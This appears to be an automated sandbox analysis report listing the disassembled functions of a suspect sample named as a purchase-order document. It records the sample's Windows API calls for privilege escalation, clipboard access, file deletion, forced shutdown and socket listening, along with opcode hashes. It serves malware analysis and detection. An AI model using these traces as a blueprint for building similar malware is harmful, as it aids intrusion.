Instruction Fuzzy Hash: 58315E71B41219BAEF206BB55C4AFBF7F6CEB44B50F11046AFA00E61D1C7B09941EAA0

Function 001A1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 001A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001A170D
Part of subcall function 001A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001A173A
Part of subcall function 001A16C3: GetLastError.KERNEL32 ref: 001A174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 001A1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001A12A8
CloseHandle.KERNEL32(?), ref: 001A12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001A12D1
GetProcessWindowStation.USER32 ref: 001A12EA
SetProcessWindowStation.USER32(00000000), ref: 001A12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001A1310

Part of subcall function 001A10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001A11FC), ref: 001A10D4
Part of subcall function 001A10BF: CloseHandle.KERNEL32(?,?,001A11FC), ref: 001A10E9

Strings

Z , xrefs: 001A1392
, xrefs: 001A125A
winsta0, xrefs: 001A12CC
default, xrefs: 001A130B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z
API String ID: 22674027-3366205268
Opcode ID: 6f4b9956698fc171bd59ddc0e1d2478d5253fb092498bdd070b8a3e91b7eb17d
Instruction ID: c4fa168453d38354dfdf4c9fa5984e1e3d64aef37214109ed5a827202125bff7
Opcode Fuzzy Hash: 6f4b9956698fc171bd59ddc0e1d2478d5253fb092498bdd070b8a3e91b7eb17d
Instruction Fuzzy Hash: 0D819B7594120ABFDF219FA8DC49FEE7BB9EF09704F14452AF910A62A1C7308994CB60

Function 001A0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001A1114
Part of subcall function 001A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1120
Part of subcall function 001A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A112F
Part of subcall function 001A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1136
Part of subcall function 001A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001A114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001A0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001A0C00
GetLengthSid.ADVAPI32(?), ref: 001A0C17
GetAce.ADVAPI32(?,00000000,?), ref: 001A0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001A0C6D
GetLengthSid.ADVAPI32(?), ref: 001A0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 001A0C8C
HeapAlloc.KERNEL32(00000000), ref: 001A0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 001A0CB4
CopySid.ADVAPI32(00000000), ref: 001A0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001A0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001A0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 001A0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0D45
HeapFree.KERNEL32(00000000), ref: 001A0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0D55
HeapFree.KERNEL32(00000000), ref: 001A0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0D65
HeapFree.KERNEL32(00000000), ref: 001A0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 001A0D78
HeapFree.KERNEL32(00000000), ref: 001A0D7F

Part of subcall function 001A1193: GetProcessHeap.KERNEL32(00000008,001A0BB1,?,00000000,?,001A0BB1,?), ref: 001A11A1
Part of subcall function 001A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001A0BB1,?), ref: 001A11A8
Part of subcall function 001A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001A0BB1,?), ref: 001A11B7

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 982d1e5d97bd5f79d60d7f0e8fdbfec642382bc16a3a8d331b98f252f88a6c61
Instruction ID: 575d18aab3b8a2c59edfeee611f77bc42fbc8e2e83b34864a54624a206542a3c
Opcode Fuzzy Hash: 982d1e5d97bd5f79d60d7f0e8fdbfec642382bc16a3a8d331b98f252f88a6c61
Instruction Fuzzy Hash: 1B717B7A90121AEBDF11DFE4DC44FAEBBB8BF09310F044615F914A7291D771AA45CBA0

Function 001BEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(001DCC08), ref: 001BEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 001BEB37
GetClipboardData.USER32(0000000D), ref: 001BEB43
CloseClipboard.USER32 ref: 001BEB4F
GlobalLock.KERNEL32(00000000), ref: 001BEB87
CloseClipboard.USER32 ref: 001BEB91
GlobalUnlock.KERNEL32(00000000), ref: 001BEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 001BEBC9
GetClipboardData.USER32(00000001), ref: 001BEBD1
GlobalLock.KERNEL32(00000000), ref: 001BEBE2
GlobalUnlock.KERNEL32(00000000), ref: 001BEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 001BEC38
GetClipboardData.USER32(0000000F), ref: 001BEC44
GlobalLock.KERNEL32(00000000), ref: 001BEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 001BEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001BEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001BECD2
GlobalUnlock.KERNEL32(00000000), ref: 001BECF3
CountClipboardFormats.USER32 ref: 001BED14
CloseClipboard.USER32 ref: 001BED59

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 9051d8630654b163ef58e1259a39ae3eeccd35ae787a30ae76094b4730c18988
Instruction ID: 8fc718e0e73b273499e13ee450636fa88d3d793f49655b059b842ae38e2b3dc4
Opcode Fuzzy Hash: 9051d8630654b163ef58e1259a39ae3eeccd35ae787a30ae76094b4730c18988
Instruction Fuzzy Hash: 6561D2352053029FD300EF64D888FAA77E8EF94714F14491EF456972A2CB71DD85CBA2

Function 001B698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001B69BE
FindClose.KERNEL32(00000000), ref: 001B6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001B6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001B6A75

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 001B6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 001B6ADF

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 001B6B32
%03d, xrefs: 001B6DA2
%02d, xrefs: 001B6C00, 001B6C0A, 001B6C5A, 001B6CAA, 001B6CFA, 001B6D4A
%4d, xrefs: 001B6BB1
%4d%02d%02d%02d%02d%02d, xrefs: 001B6B6A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 354bf5aa9d81db342a0373e38375aaea42cc0ef577e9f38a2c38c686aa40e211
Instruction ID: b363b33c2f2a2b20c561079e730a94289c976e43239faa5dc57d539463a1f36a
Opcode Fuzzy Hash: 354bf5aa9d81db342a0373e38375aaea42cc0ef577e9f38a2c38c686aa40e211
Instruction Fuzzy Hash: 17D17271508300AFC714EBA4D891EAFB7ECAFA9704F44491DF585D71A1EB34DA48CBA2

Function 001B9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001B9663
GetFileAttributesW.KERNEL32(?), ref: 001B96A1
SetFileAttributesW.KERNEL32(?,?), ref: 001B96BB
FindNextFileW.KERNEL32(00000000,?), ref: 001B96D3
FindClose.KERNEL32(00000000), ref: 001B96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 001B96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 001B974A
SetCurrentDirectoryW.KERNEL32(00206B7C), ref: 001B9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 001B9772
FindClose.KERNEL32(00000000), ref: 001B977F
FindClose.KERNEL32(00000000), ref: 001B978F

Strings

*.*, xrefs: 001B96F5

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: db18c2fa0c99ba2b717eb38ef472f5bfa9f3e0e29bacdefc11be97f87bef9ef0
Instruction ID: 3ec6a01ba28fd3cbdde3f344a5ba05b88bd3e501bfccb4f00e216375309551cf
Opcode Fuzzy Hash: db18c2fa0c99ba2b717eb38ef472f5bfa9f3e0e29bacdefc11be97f87bef9ef0
Instruction Fuzzy Hash: 0F31E47254221A6EDF14EFB4DC48ADE77ECAF09320F104556FA05E21A1EB30DD91CE90

Function 001B979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001B97BE
FindNextFileW.KERNEL32(00000000,?), ref: 001B9819
FindClose.KERNEL32(00000000), ref: 001B9824
FindFirstFileW.KERNEL32(*.*,?), ref: 001B9840
SetCurrentDirectoryW.KERNEL32(?), ref: 001B9890
SetCurrentDirectoryW.KERNEL32(00206B7C), ref: 001B98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 001B98B8
FindClose.KERNEL32(00000000), ref: 001B98C5
FindClose.KERNEL32(00000000), ref: 001B98D5

Part of subcall function 001ADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001ADB00

Strings

*.*, xrefs: 001B983B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: a2660e9c33dd03fdf8231f50ddcd9de09f27a2006043955d1e2fadd560335eca
Instruction ID: 5ebfb528ac21e9be1df646d224f41bb4f302c31639098593abb823f61c3b8380
Opcode Fuzzy Hash: a2660e9c33dd03fdf8231f50ddcd9de09f27a2006043955d1e2fadd560335eca
Instruction Fuzzy Hash: 0031127250121E6ADF10EFB4EC48ADE77BCAF06320F104556EA00E20E1DB30DA96CAA0

Function 001B8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 001B8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 001B8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001B8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001B8310
SetCurrentDirectoryW.KERNEL32(?), ref: 001B8324
SetCurrentDirectoryW.KERNEL32(?), ref: 001B8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001B838C
SetCurrentDirectoryW.KERNEL32(?), ref: 001B8395

Strings

*.*, xrefs: 001B839B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: fdd964d0929e29ca5514a5a0300a148153c204be66a397aeb15e12dc89bbc532
Instruction ID: 9b49178c694891e401f93924861950f2c7bacafe958dfe418cd09dc738b7247b
Opcode Fuzzy Hash: fdd964d0929e29ca5514a5a0300a148153c204be66a397aeb15e12dc89bbc532
Instruction Fuzzy Hash: F26159725083459FCB10EF64D8809AEB3ECFF99714F04491AF999C7261DB31E945CB92

Function 001AD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00143AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00143A97,?,?,00142E7F,?,?,?,00000000), ref: 00143AC2

Part of subcall function 001AE199: GetFileAttributesW.KERNEL32(?,001ACF95), ref: 001AE19A

FindFirstFileW.KERNEL32(?,?), ref: 001AD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 001AD1DD
MoveFileW.KERNEL32(?,?), ref: 001AD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 001AD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 001AD237

Part of subcall function 001AD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,001AD21C,?,?), ref: 001AD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 001AD253
FindClose.KERNEL32(00000000), ref: 001AD264

Strings

\*.*, xrefs: 001AD0CD, 001AD0D6, 001AD0EB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: abcce554ec9f594acaed3c9824c1bf8c2d3408c331a704975bd90c2da7053e17
Instruction ID: e94fe19ac2b6f85d99f35bbadbaaacdeb927d10a88c753362bd079bab7d20636
Opcode Fuzzy Hash: abcce554ec9f594acaed3c9824c1bf8c2d3408c331a704975bd90c2da7053e17
Instruction Fuzzy Hash: 8961603580110D9FCF05EBE0E992AEDB7B5AF66304F604166E406771A2EB305F09DB60

Function 001BED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 001BED91
EmptyClipboard.USER32 ref: 001BED97
GlobalAlloc.KERNEL32(00000002,?), ref: 001BEDAC
CloseClipboard.USER32 ref: 001BEEA3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2e7e903bdebf3f315500f55df17264010b5b044bd6b4ed649e38427e4a658f8e
Instruction ID: 2e681123ae6cfbf8ee5eb1d80282386f79ca5ccaa28f2aec17fe753a22acc445
Opcode Fuzzy Hash: 2e7e903bdebf3f315500f55df17264010b5b044bd6b4ed649e38427e4a658f8e
Instruction Fuzzy Hash: 7541BE35606612AFE720DF19E888B99BBE5EF44318F14C49AE4158FB62C775EC81CBD0

Function 001AE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 001A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001A170D
Part of subcall function 001A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001A173A
Part of subcall function 001A16C3: GetLastError.KERNEL32 ref: 001A174A

ExitWindowsEx.USER32(?,00000000), ref: 001AE932

Strings

SeShutdownPrivilege, xrefs: 001AE902
, xrefs: 001AE920
@, xrefs: 001AE925
, xrefs: 001AE95C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: e6ad180fda822dfe47621d64569b90339bb9f75bcf578710b6e575ad2caca6b9
Instruction ID: 7d5f24cc18d3cf24a4cac72ab988cabe195133fd25b153d88768e39c808b3433
Opcode Fuzzy Hash: e6ad180fda822dfe47621d64569b90339bb9f75bcf578710b6e575ad2caca6b9
Instruction Fuzzy Hash: 6001D67A611311ABEB5426B89C8ABBB729CAB16758F154922F802E21D2D7A05C84C5E4

Function 001C1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001C1276
WSAGetLastError.WSOCK32 ref: 001C1283
bind.WSOCK32(00000000,?,00000010), ref: 001C12BA
WSAGetLastError.WSOCK32 ref: 001C12C5
closesocket.WSOCK32(00000000), ref: 001C12F4
listen.WSOCK32(00000000,00000005), ref: 001C1303
WSAGetLastError.WSOCK32 ref: 001C130D
closesocket.WSOCK32(00000000), ref: 001C133C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 3f6a58d3e1d20f38102ad23a6be20ebe58aaeadfec7798f16f17b8e80e710bfa
Instruction ID: d92cc8cfa6f6d6e16bd2b72ba7efc64be6f0677521fa1c04255536caf4069e4a
Opcode Fuzzy Hash: 3f6a58d3e1d20f38102ad23a6be20ebe58aaeadfec7798f16f17b8e80e710bfa
Instruction Fuzzy Hash: 1A416E35601141AFD710DF24C488F29BBE6AF56318F28858DE8568F2A3C771EC81CBE1

Function 0017B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0017B9D4
_free.LIBCMT ref: 0017B9F8
_free.LIBCMT ref: 0017BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001E3700), ref: 0017BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0021121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0017BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00211270,000000FF,?,0000003F,00000000,?), ref: 0017BC36
_free.LIBCMT ref: 0017BD4B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 4343a6f2d91b320eb58ac05cbd318b768275657fb18bd014ca00e97e6b5a46a9
Instruction ID: d8e50a08684c964bd3aa1b0f7c7bfe28d868566dbcc9fba96314416af102be4c
Opcode Fuzzy Hash: 4343a6f2d91b320eb58ac05cbd318b768275657fb18bd014ca00e97e6b5a46a9
Instruction Fuzzy Hash: 59C12971908219AFCB25AF78DC85BAA7BB8EF51310F14C19AE99CD7251EB308E41C750

Function 001AD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00143AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00143A97,?,?,00142E7F,?,?,?,00000000), ref: 00143AC2

Part of subcall function 001AE199: GetFileAttributesW.KERNEL32(?,001ACF95), ref: 001AE19A

FindFirstFileW.KERNEL32(?,?), ref: 001AD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 001AD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 001AD481
FindClose.KERNEL32(00000000), ref: 001AD498
FindClose.KERNEL32(00000000), ref: 001AD4A1

Strings

\*.*, xrefs: 001AD3F2

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 0c4621bc845d0176bd9c57aa882f61f601f7db38507967a7d189c3d3603f61a1
Instruction ID: f6ab44dc650406ffa4e0fb9360131d7211e4e47f0b97b92457efac5a86242c15
Opcode Fuzzy Hash: 0c4621bc845d0176bd9c57aa882f61f601f7db38507967a7d189c3d3603f61a1
Instruction Fuzzy Hash: 343170710093459FC304EF64D8558AF77A8BFA6314F444E1EF4D6935A1EB30AA09C763

Function 0017E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0017E645

Strings

1#IND, xrefs: 0017F83D
1#INF, xrefs: 0017F852
1#SNAN, xrefs: 0017F844
1#QNAN, xrefs: 0017F84B

